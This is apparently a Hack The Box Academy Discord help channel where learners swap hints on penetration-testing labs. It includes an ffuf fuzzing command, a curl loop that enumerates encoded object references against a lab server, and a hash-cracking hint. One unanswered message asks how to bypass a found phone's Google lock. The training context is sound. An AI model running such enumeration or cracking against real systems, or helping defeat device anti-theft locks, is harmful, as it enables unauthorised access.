I'm on the setting up module and am setting up ParrotOS inside VirtualBox but everytime I try to run the install I get stuck on this screen ^^^^ Any help is appreciated!!

is it on the web or some software

Not sure what you mean

I'm on this portion of the course in the Academy

In the Module 'Setting Up'

Hello friends I am making the CRACKING PASSWORDS WITH HASHCAT module, I am in the Cracking Common Hashes part. I am asking the question "Crack the following hash: 7106812752615cdfe427e01b98cd4083" someone has any advice or clue to solve hash thanks.

not sure what to do but you can spawn an workstation and use it

until you get some solutions

What do you mean? Use the pwnbox? I already used all my time up

oh then you have to wait

for a day

Yeah for the Pwnbox, but I'm trying to run it through a OpenVPN so I could keep working

oh great then keep trying

If you're having trouble installing it on virtualbox try to download the disk image instead (sometimes called OVA Appliance and similar) - difference is that you can just import the file into virtualbox and then it should work without any installation needs

@mild kettle what @high zinc said. Use kali or parrot image and you won’t need to worry about the time constraint. Dm me if you can’t get it working

Anyone who finished the Cracking Passwords with Hashcat Academy Module or is at ease with hashcat could help me ? 🙂
I'm stuck at "Cracking Common Hashes"

yea

pm sent 🙂

Still stuck here 😦

Hello friends I am making the CRACKING PASSWORDS WITH HASHCAT module, I am in the Cracking Common Hashes part. I am asking the question "Crack the following hash: 7106812752615cdfe427e01b98cd4083" someone has any advice or clue to solve hash thanks.

Try using the hash mode for ||NTLM||

Thanks bro with rules and identity the right hash I can :)

hmm

After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.
Any hints? I know that it is port, but i`m not sure what to do...

@manic moat don't spoil it

i've just done it as well

did you read the nmap help pages?

Better?

I`m losing myelf between nc and nmap

Not sure what to use

i used neither

i tried doing it your way and that works as well @manic moat

if you found the port you can look up ||firewall evasion|| with nmap, DM me if you're still stuck

is it normal for Joomla admin password cracking to take this long in "Attacking Common Applications"?

Same here : found the vulnerable app, but I can't find a way to exploit, even with 2 POCs found on exploit-DB. Can anyone who solved this give a nudge ?

Yo, have anyone end the Web Attacks module?

I am stuck on this same spot and cannot find anything vulnerability that I can leverage to gain a shell or RCE.

Can someone help me

Pls

where are you stuck on

trying stack overflow for windows module ... skill assessment, have completed every step but after running final exploit getting "No route to host error", can anyone tell what can be the problem

Can someone help me with the Linux Fundamental module? Specifically for this one Use "systemctl" command to list all units of services and submit the unit name with the description "Load AppArmor profiles" as the answer.

I used the correct command however it doesn't seem to accept my answer as it shows incorrect 😦

Hi if someone is stuck in cracking handshakes send me a message ;)

try this systemctl list-units --type=service | grep apparmor

any help in bypassing filters in HTTP verb tampering section in webattacks module
i bruteforced with every verb and with every injection filter

it still says malicious request denied

pls help

Just wondering if anyone can help me with the XSS skill assessment part where # comment doesn't have = so I can't add any value in...

This is what I did. And the unit name listed is what I submitted and gave me an incorrect answer

DM me

DM me

I am currently doing the Windows Stack-Based Buffer Overflow module and can’t get ERC to work on the Windows VM provided by the module. I keep getting error messages like this:

ERROR: Could not find a part of the path 'C:\Program Files\x64dbg\x64\plugins'.
ERC --Config
--------------------------------------------
New Working Directory = C:\Users\htb-student\Desktop\
--------------------------------------------
[PLUGIN, ErcXdbg] Command "ERC" unregistered!
[PLUGIN, ErcXdbg] Command "ERC" registered!

I already reinstalled the plugin. And I started the 32bit version, so I don’t know why it is complaining about the x64 folder.
Can anybody help?

@floral brook Pardon but why dont you use the VM provided by the module maker initially? Or you want to use your own?

Sorry, I just made my question more precise. I am talking about the provided VM.

Right after posting I realized this might be misunderstood 🙂

Ok, I should have read the error message it printed above the help message too. It works now. You cannot use any ERC command, not even bytearray, without ERC being attached to a process.

One of those moments that make you feel dumb.

@main vapor But thanks for trying to help.

Need help

Then I think the suggested script is not working. Time to inspect the login mechanism more closely.

Hi, Did someone have problems with the splunk container on the attacking common applications module? The splunk ports respond with a connection reset error

@dreamy pecan|| https://www.calculator.net/ip-subnet-calculator.html||

I did. It was really, really slow and it kept disconneting. When I pinged the target IP and refreshed the splunk page it "magically" worked again. That was a frustrating part of this module. Maybe as much as the skills assessment I'm currently stuck with.

Ok thank you 🙂

Hi, I finished the Common Applications Module (also received some help for the final assessment). feel free to DM me if you want

@floral brook Download ERC Plugins

Finally cracked the password. It took some time, I must say.

Friends, tell me, what do I need to do to fully see all these lines?(not dots)

Pipe the command to Format-Table -AutoSize -Wrap and see if it helps.

Could anyone give me a sanity check on "Attacking Common Applications" / osTicket?

Could someone explain to me how to take a VM snapshot in/of VirtualBox?

google it

I did. Found the solution! Thanks

module: network enumeration with nmap
section: firewall and idp/ips evasion - hard lab
hey. so i think i found the port i need which didn't show up with normal scans. now how could i get a flag from this port. the question says you need the version number of the service running there but the customer service or what said that i need a flag

could someone help me?

tried to connect it with nc but couldn't

someone pls

feel free to PM

PM me if you still need help

I'm stuck on the SQLMap Essentials Skills Assessment if anybody can help

i appologize for posting this in 2 places....anyone got "user" on horizontall box and wanna DM for a quick chat?

you can DM me

Hello, I am currently doing the htb academy on WIndows Fundamental Module. I however got stuck at skill assessment. Any idea how can I create security group called HR? I already create the folder named Company Data and subfolder named HR.

Paul

Anyone knows what we have to change between proxychains3.1 and proxychains4 ?
Because I am putting

#socks4     127.0.0.1 9050
http 127.0.0.1 8080
https 127.0.0.1 8080

At the end but I get this :

[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
error: invalid item in proxylist section: https 127.0.0.1 8080

I am on the Linux fundaments and I can't get the target to work

sorry to intterupt, but on the BROKEN AUTHENTICATION module in htb what is the wordlist to use on http://46.101.8.93:30815/question2/

Anyone available to help with the Linux Priv Escalation? Stuck on the Privileged Groups section

Hey all I am stuck on the user management question 8 about locking an account I have tried all basic ways of typing but nothing seems to be correct any help is much needed thank you

Not sure if anyone would agree with me but I genuinely think that the text color used in the modules is extremely dull and shallow, compare it with white instead!

The original font color, I mean it's almost a camouflage with the background.

Stuck here... Not sure where , what and how should i search

Ok, i found the port but after use some utility it says :Address already in use... I cant get flag

Ok, here is an answer || check that there is nothing on port you need to use with sudo lsof -i :and port here|| cuz i have my head blew off by this task

Did you figure this one out? I’m stuck here too.

Bright white on a dark background puts a strain on the eyes with longer periods of reading. The team designed it to reduce eye strain

Am on the SQLi module. Resetted the box many times, still no luck. This happened every time, i.e. it NEVER connected in the first time (by SQL). Is it something I am doing wrong here?

Can't even ping the box

The internet connectivity is pretty great. Not quite getting why this is happening ;-;

You are not supposed to ping the host @noble stirrup

You are supposed to connect to MySQL on the given port.

Obviously, thats what I did above, pinged it to check if it works,

In the same image

Oh I did not see that pardon me

It might be from the VPN maybe?

I have seen some reddits where this is addressed as well, cant seem to find anything there

I would reset it and the host also

You mean the instance?

yes yes that

Ig I'll have to do on my VM then, resetiing it would terminate

Tbh, yesterday, had tried this on my vm, exact same command, didn't work there either. Am gonna try dat again

Yes if things dont work out in the Pwnbox just go for the host, I have never experienced any issues while doing it from mine.

I see

I did the module and everything ran sweet

That's nice

Hopefully things run smoothly for me as well

@noble stirrup Check this on your way https://stackoverflow.com/questions/5755819/lost-connection-to-mysql-server-at-reading-initial-communication-packet-syste because it might be your firewall.

Ah I see

Nope, nothing worked, I was in doubt if this would work when I saw it since the stack overflow page had an issue regarding system error : 0 whilst, mine said system error:11.
And tis confirmed, HTB, do something

Since its extremely frustrating. This should not happen :/

what font is this?

not sure, but if you go into the dev tools and look at the css rules applied to that text, it should show it

hi, i found a samsung A40 and i need to bypasss google check security after errasing all datta, can someone help me pls

?

Is it just me having an issue connecting to mysql for sql injection fundamental? It just doesn't work with right ip and port

Error 2002

@noble stirrup are you connect vpn buddy

so i'm just using the workstation provded for each lab

Yip

Hey. For XSS module, i can't get the target to be spawned. It just stays stuck at 'Target is spawning'.

I'm currently doing the getting started module, upto web enumeration and it seems that no matter what I do to the target IP I can't get a response. Whatweb, Nmap, Gobuster, just visiting the ip in browser to look for a webpage. I am connected via VPN from a VM. Google has been no help. Any suggestions?

Even when on the pwnbox I couldn't get it to give me a response.

currently stuck on that too

Was an issue with the target. Respawned it and worked.

is flag1.txt missing from the linux privilege escalation target? It says you can cat for it in the bash_history but I dont see the file anywhere on the system even after restarting the target

I found this flag today, it is in other location. Use find command.

Bash history is a tramp 🤭

Is it named flag1.txt? This still shows nothing

Yes, it is

I'm seeing flags 2,3, and 4 but not 1

Modify find params

Ok that helped. I found it. It do be kinda hidden tho.

Hi. Anyone able to help with Broken Authentication - skill assessment? Looks like I'm stuck.

Yes I know, I found first flag 2 and 3 before 1, 😅

Has any done the "Attack common application" module? I am stuck at "attacking gitlab" and "skill assessment 1". I could use some help. Please DM me!

Is the target being non-responsive all the time or just sometimes being like this ?

Had spawned multiple times, each of the time I reset the machine, it still does not connect to mysql

Used both pwnbox and VPN for connecting, but no luck

I run into a situation where I can connect to a target initially, but will disconnect every 3-5 minutes. It is due to I connect to my HTB academy VPN from multiple machine: my VM, VPS and Pwnbox. I am not sure whether it is what happening to you

My situation is a bit different. I can't connect via MySQL to my Target at all

Can HTB Academy prepare you for bug bounties?

@noble stirrup Still not connecting to MySQL target? Im having the same issue

Has anybody been able to get flag5 for Linux privilege escalation assessment?

finally got it, PM if you need help

Yes

But it's not a tutorial from a-z and you don't start magically making money at the end

i got it

Yeah I was thinking of it as more of a thing to have fun with whilst learning a little, but wondered if the content covered was enough to get basic footing, whilst completing the academy I'll try researching further into the subjects which pique my interest and try play around with them more

Oh it contains a lot of great courses which will definitely help you with bug bounty hunting

whilst completing the academy
Not sure if that's possible on the free version though, due to the paid modules thing
Don't really have any money as a student so I can't buy more cubes, but I'm sure there's some good free resources out there

some might require a small fee though 😅

Yeah 😬

If your school qualifies for this, you can get your account upgraded to a student account

this will get you a lot of the paid modules for free if I remember right

@languid fjord knows ❤️

yes

what is up

tier 2 and below iirc, still paid but at a discount

aah

my bad

I'm trying to get the Using Web Proxies, Repeating Requests section flag, but everytime I try to 'cat' into the folder/file nothing populates on my Response part in BurpSuite. Could someone set me in the right direction? Also here is a photo of what I've tried so far

i can't seem to find the link to download the openvpn profile for HTB Academy. Anyone know where that is?

Check this out: #modules message

Did you change any settings or smth

Love this student discount

Yeah I was on the student plan and it was great. Now I am going to move to paid plan to get some cube for Tier 3 and 4

I worked on that module yesterday

I had no issues

Which section are you on

That was a tough one

You need to use the name you found from the previous excerise

It Starts with an H and end with Y

Thats the name of the employee

https://forum.hackthebox.com/t/htb-academy-login-brute-forcing-skill-assessment-service-login/3940/8

I'm having a bit of an issue.
I get the error that the host is down in nmap and then using the -Pn option it says host is up but all 1000 ports are filtered.

• The green chat bubble is not active with message "Something's wrong We're unable to load the messenger"

I have no way to contact the support

Any ideas that I could try?

hey when trying to use ffuf (like in attacking webapps with ffuf), the output looks like

:: Progress: [4614/4614] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 4614 ::

``` does anybody know how to make the output normal?

the command i used is ffuf -u http://ignition.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt:FUZZ and it just spams the Progress thing on new lines

does it look better when you run it in a bigger window?

no, basically the same but in a bigger window

Are there any modules that teach about port forwarding?

What your ffuf version ?

1.3.1 Kali Exclusive (idk why it says kali exclusive cos im using it on parrot os)

Did you check the github repo to see if someone have this issue ?

I just checked and i dont see someone with that issue, maybe i missed it

It used to output properly, but now it doesnt im going to try switching which version of ffuf i have downloaded

uninstalled ffuf and installed ffuf v1.3.1-dev with git clone https://github.com/ffuf/ffuf ; cd ffuf ; go get ; go build, and now it works in fullscreen/bigger window (size 93 width is what makes it work)

kali use zsh as default terminal whereas HTB pwnbox use bash. Could that be the cause?

Hello i need help i am on the first module and i dont find this answer. I am on : NETWORK ENUMERATION WITH NMAP . can you help me because i did a lot of mp but i can't find the hostname ?

have you tried option -A

no

It basic does -sC -sV -O and give you a lot info on the target

ok i try

i try but i dont see host name

which section is this question

NETWORK ENUMERATION WITH NMAP

I am referring to the section name in the table of content

Host and Port Scanning

Keyword for this question is smb, try to look through the nmap output

ok

the nmap output with nmap -A ?

yeah

ok

good thanks

Stuck on Broken Authentication skill assessment. Anyone able to help? DM please.

Hi I am stuck in sqlmap flag#5 I got one entry but is not the flag is blank... Could someone help me out please?

Hey, sorry i did not. I'm still missing the last question on Active Directory LDAP

What non-default privilege does the htb-student user have?

Same.

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www(.)inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
All numbers i get are wrong.... Hints? Already use curl, grep, sort, wc

ADDED
Did it manualy, cuz all of those utilities gives me higher number of links than it actialy is

I'm having a bit of an issue.
Using Pwnbox, I get the error that the host is down in nmap and then using the -Pn option it says host is up but all 1000 ports are filtered.
I can not contact the support, the green chat bubble is not active with message "Something's wrong We're unable to load the messenger" 😦
someone help please 😦

can you ping the host

yep

that would be strange. May you can share a snapshot of your nmap command and output

💯

Hi I’am working on Attacking Common Application in Splunk - Discovery & Enumeration. I spawned the target but it turn out to be running only PRTG Service running (no splunk) please help 🙂

Try to allow 5 minutes for all services to start up. If it's still not loading and you're sure that you are spawning the right target i think you need to contact HTB support on the main platform (the chat bubble) for help

Thank you 😊

Getting time out while using my own VM for connecting FreeRDP to windows. Weird, it works fine in the web browser.

Packet drop could happen if your VPN is connected by multiple devices at the same time

anyone please give me an nudge on command injection module bypassing other blacklisted characters section

What's the secret to get paste to work from local PC to the PwnBox? Can copy out, but not paste in.

Hello can you help me i dont find the answer, i dont understand the question. I do not understand what to put is the version of what services?

uhm

Hi im new

same here

the only thing connected to the VPN is the VM

Hi new, I'm Birb!

Hi New Too

(MewTwo anyone?)

Yes

can you help me ?

depends if I've done the module or not

which one?

Section : NETWORK ENUMERATION WITH NMAP : Firewall and IDS/IPS Evasion - Hard Lab

haven't done that 😦

ok

Submit ur quetion

Hello can you help me i dont find the answer, i dont understand the question. I do not understand what to put is the version of what services?

I have't done this lab show me hint

Maybe i can help u

Use version detection swith with nmap may b u will find something

*switch

HUM OK

just finished "WINDOWS FUNDAMENTALS" I had to redo the last section like 3 or 4 times to get the SIDs right 😕 but I had WinFun!🤣

What does one needs to learn before trying the academy from Hackthebox?

besides the basics of how to use a browser, nothing

It's designed to be approachable by everyone regardless of skills, however not all topics are beginner friendly

the free ones are good starter modules (although are still of high quality)

Yeah but, do you understand every bash/sed line they ask for?

Because copy + paste isn't learning imo

I saw some lines that where hard to follow

For me

So how do you do it?

So fast

most modules will explain how some theory is and then have you apply that theory

some of the modules are structured such that you have to do a little Googling or reading the manual of something on the side, too, to successfully answer the question

but i mean...

it's pretty basic theory in most of the free modules

My own Introduction to Python 3 module that I wrote, I wrote in a way that if you've played around with programming before or have seen the "hello world" of another language, you can follow along easily

but if it's the very first time you touch a programming language, the learning curve is a few degrees too steep for comfort for many

that said, it covers all of the most basic concepts

...it just moves a little fast for complete beginners, and be design (I could write a book with all the things I wanted to say about it lol)

It's the command line that i get stuck at sometimes. I know a little bit C and use Python a lot these days

that's what some of the reviews say as well: if you're a complete beginner and have never seen a programming language before, it could be a good idea to just play around with it on something like coderank and what they're all called

I'm ok using Bash, but when sed/awk comes along.. it's harder

not because my module is hard, but because it assumes you have seen the "Hello World" of another language

right

Hacking is not about memorising cryptic combinations of sed/awk/grep/cat/stuff

I haven't had to use sed/awk every before in my life

lol

I'm sure you'll be fine

It's meant for beginners afterall

I'll check it out again then... thank you. Btw what are you using Python for?

work mostly

automating CI/CD configurations, test frameworks, data extraction and report generation

and basically anything I need to automate in Hack The Box 😄

My Python is 200 times better than my bash

Ah cool, i have to google the definition of CI/CD though haha. The problem i've with Python is that the use of try except is not clear. Some disapprove the basic use that the documentation implies, and create error functions/methods. Also the paradigm of the use of Classes differs from opinion, while PEP can be a bit vague to me lol. What's your take on this?

I mean composition is good, but the use of instances should be limited.. eh ok...

My first language I learned well was Java and in Java I was taught to only attempt to handle exceptions if I had no other way to verify whether or not something would go well, e.g. if writing a file to a disk would succeed (what if there not enough free disk space?). Because of that I don't use try-except a whole lot, because there are ways to work around a lot of the usual exceptions one could run into.
That said, in Java handling exceptions is very expensive, resource wise, and should be limited. In Python, trying something which succeeds is done at nearly no extra strain on the system, if any at all. If it fails and an exception has to be caught and handled, there is some overhead yes, but if it goes well, there is virtually (or literally - I forgot) no performance difference.

Out of principle I don't use them a lot, though

Need to grab a value from a dictionary, but you don't know if it will succeed? Well, you could check if my_key in my_dict before trying to get it

you know

Error functions - not sure what these would be to be honest.

I'm not sure either, but they look awful

As for classes, because Python is "multi-paradigm" and loosely typed, I think people use them out of habit from previous experience more so than for "pythonic" reasons

There was this guy Raymond who did a presentation on the MRO, Method Resolution Order, in Python (https://www.youtube.com/watch?v=EiOglTERPEo) which demos how one could use the core design of Python and class inheritance to ones advantage

it looks super (pun intended) cool, but besides a test case I think my old lead dev has since then rewritten, I've never actually used it myself 😄

(Something-something I was able to "hijack" a session object or similar without mocking, simply through class inheritance and careful construction)

It was fun, but a little too out of place in our codebase back then

Can I get a sanity check on the skills assessment for Windows Binary Exploitation?

Cool i'll check that out then

Thanks!

It's a good talk and very captivating I though - it's about Pizza 😄

Anyway I should go to bed... have a good one and welcome on board

I haven't done the module myself but maybe I can be your rubber duck 😄

I'll DM 😛

sure

bro

HOW TO HAGG

hello can you help me to solve this quetion in command injection module 🙂

Command you need to execute is 'ls /home/'. Try a few things, the answer is within the module

can i dm you ?

Ok

Hello, I have just completed the flag for the Web Request POST but the flag that i get from the server does not work, anyone else facing the same problem?

Not working as well

The hex alone is enough but if it's still not working reset the challenge

like close and re open a window to get a new IP, idk

Okey will try that thanks for the tip!

This sucks man! I have used so much time in solving the lab and now it says the flag is incorrect, I have checked it twice for not including any whitespaces

anytime, it's very case sensitive so yeah make sure to only put the flag

but I don't see anything other that could be a solution

me neither mate!

Thanks though!

So I found the solution the flag should be submitted without "!"

at the end, If you find any flag and having problem with submitting it.

Hi, did anyone finish the final assessment of the Whitebox Pentesting 101: Command Injection module? I got the exploit working locally at my PC and it seems also working on the server., but i don't see anything... i think i'm either reading or writing the wrong file 😦

Well yeah only digits & letters, well done

Hello, on the SQL Injection course in HTB Academy, the instructions ask me to connect to a mysql database. However, I don't see what password I'm supposed to use. Where might i find it?

nm, got it. the pw was on a previous page

hi there, can i ask someone a question about "web attack" module?

On the Active Subdomain Enumeration portion of Information Gathering - Web Edition -- can anyone help nudge me on how getting finding TT record contents, along with FQDN of 10.10.34.136 & 10.10.1.5? I'm fairly certain it's all about leveraging other zone, but for the life of me, I cannot seem to get it to work. (So either [a] my presumption of what other zone is, is wrong, or [b] I'm doing something wrong.) Thx.

@fossil crescent Look at #858470491676737536 because if I am not mistaken someone asked the same question as you.

Same problem here.

me too😆

@main vapor Thx for the response. Unfortunately it didn't help as I was already trying to run nslookup with the DNS server... BUT... with a bit more playing around, I did just get it solved!

EDIT: ~~I do not understand why the solution is what it is (if anyone can help educate me, would be VERY grateful)... but happy it's solved. ~~ Thx to @lament rampart for helping bring clarity on this.

Could you enlighten us Patrick ?

@knotty flare & others -- The nudge I'll give is that what I thought I should be querying (||the other SOA zone||) wasn't the right thing to query. If you ||quasi-follow the Gobuster steps (I didn't actually use Gobuster, just nslookup)|| you should get there.

If remain stuck, feel free to DM me.

Hey can I dm someone for Intro to Network Traffic Analysis module

@plush garden you still stuck I can help you

Dm me

Anyone having lost connections to the target VM in the Windows Fundamentals module?

I can't keep that rdp connection up for more than a minute, and that if I actually get to connect

Hi, did you find a fix for this? I am having the same problem from both the Pwnbox and my own VM+OVPN

@sour zealot i used the Pwnbox after trying with my own vm and it worked fine for me. couldn't find the cause for the error

I experience time out issue before, then I realized it is because my academy.opvn is connected by multiple device (my VM, VPS and Pwnbox). Once I shutdown other connection, it is back to normal

By the way, when using Pwnbox If you close the browser without terminating it, the Pwnbox is still connected to your VPN

I think you're right. I just shut down my academy.ovpn and the connection is now stable. So I guess that the Pwnbox and the academy.ovpn are just using the same IP Address

Thanks!

al ejecutar este escript
#!/bin/bash

for i in {1..10}; do
for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do
curl -sOJ -X POST -d "contract=$hash" http://server_ip/:PORT/download.php
done
done
me sale el siguiente error: Contract name is not defined.
Alguien tiene alguna sugerencia?

¿Quñe módulo es?

Web Attack

Bypassing Encoded References

hello has anyone done ffuf module;

@subtle heron -- I just completed it

Any one done before BROKEN AUTHENTICATION > Guessable Answers ? Im little stuck with that

has anyone pass "Firewall and IDS/IPS Evasion - Hard Lab"
need some tips for this one please 😩

on "NETWORK ENUMERATION WITH NMAP" module